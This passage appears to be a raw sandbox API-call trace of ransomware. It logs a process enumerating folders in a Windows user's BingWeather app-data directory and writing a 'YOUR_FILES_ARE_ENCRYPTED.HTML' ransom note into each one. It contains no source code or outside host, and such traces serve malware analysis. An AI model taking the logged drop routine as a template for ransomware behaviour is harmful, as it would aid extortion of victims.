(lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.434] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetCookies") returned 99 [0115.434] GetProcessHeap () returned 0x600000 [0115.434] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.435] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetCookies" [0115.435] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0115.435] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1c73b076, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c73b076, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1728, dwReserved1=0x62ecf8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0115.435] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1c73b076, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c73b076, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1728, dwReserved1=0x62ecf8, cFileName="..", cAlternateFileName="")) returned 1 [0115.435] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1c73b076, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c73b076, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1728, dwReserved1=0x62ecf8, cFileName="..", cAlternateFileName="")) returned 0 [0115.435] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0115.435] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0115.436] GetProcessHeap () returned 0x600000 [0115.436] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.436] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingweather_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.437] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.437] CloseHandle (hObject=0x324) returned 1 [0115.437] GetProcessHeap () returned 0x600000 [0115.437] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.438] GetProcessHeap () returned 0x600000 [0115.438] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.438] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1c73b076, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c73b076, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0115.438] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.439] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetHistory") returned 99 [0115.439] GetProcessHeap () returned 0x600000 [0115.439] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.439] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetHistory" [0115.439] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0115.440] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1c73b076, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c73b076, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1728, dwReserved1=0x62ecf8, cFileName=".", cAlternateFileName="")) returned 0x626838 [0115.440] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1c73b076, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c73b076, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1728, dwReserved1=0x62ecf8, cFileName="..", cAlternateFileName="")) returned 1 [0115.440] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1c73b076, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c73b076, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1728, dwReserved1=0x62ecf8, cFileName="..", cAlternateFileName="")) returned 0 [0115.440] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0115.440] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0115.440] GetProcessHeap () returned 0x600000 [0115.440] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingweather_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.441] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.442] CloseHandle (hObject=0x324) returned 1 [0115.442] GetProcessHeap () returned 0x600000 [0115.442] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.442] GetProcessHeap () returned 0x600000 [0115.442] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.442] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c73b076, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c73b076, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="Temp", cAlternateFileName="")) returned 1 [0115.442] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.442] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\Temp") returned 92 [0115.442] GetProcessHeap () returned 0x600000 [0115.442] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.442] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\Temp" [0115.442] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\Temp\\*" [0115.442] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c73b076, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c73b076, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1728, dwReserved1=0x62ecf8, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0115.443] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c73b076, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c73b076, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1728, dwReserved1=0x62ecf8, cFileName="..", cAlternateFileName="")) returned 1 [0115.443] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c73b076, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c73b076, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1728, dwReserved1=0x62ecf8, cFileName="..", cAlternateFileName="")) returned 0 [0115.443] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0115.443] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0115.443] GetProcessHeap () returned 0x600000 [0115.443] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.443] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingweather_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.444] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.445] CloseHandle (hObject=0x324) returned 1 [0115.445] GetProcessHeap () returned 0x600000 [0115.445] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.445] GetProcessHeap () returned 0x600000 [0115.445] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.446] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c73b076, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c73b076, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="Temp", cAlternateFileName="")) returned 0 [0115.446] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.446] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0115.446] GetProcessHeap () returned 0x600000 [0115.446] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.446] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingweather_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.447] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.448] CloseHandle (hObject=0x32c) returned 1 [0115.448] GetProcessHeap () returned 0x600000 [0115.448] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.448] GetProcessHeap () returned 0x600000 [0115.448] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.448] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c524ee5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c524ee5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c524ee5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0115.448] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.448] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AppData") returned 92 [0115.448] GetProcessHeap () returned 0x600000 [0115.448] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.448] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AppData" [0115.448] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AppData\\*" [0115.448] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c524ee5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c524ee5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c524ee5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.449] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c524ee5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c524ee5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c524ee5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="..", cAlternateFileName="")) returned 1 [0115.449] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c524ee5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c524ee5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c524ee5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="..", cAlternateFileName="")) returned 0 [0115.449] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.449] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0115.449] GetProcessHeap () returned 0x600000 [0115.449] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.449] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingweather_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.449] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.451] CloseHandle (hObject=0x32c) returned 1 [0115.451] GetProcessHeap () returned 0x600000 [0115.451] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.451] GetProcessHeap () returned 0x600000 [0115.451] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.452] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c4fed09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c4fed09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0115.452] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.452] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\LocalCache") returned 95 [0115.452] GetProcessHeap () returned 0x600000 [0115.452] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.453] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\LocalCache" [0115.453] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\LocalCache\\*" [0115.453] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c4fed09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c4fed09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0115.453] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, 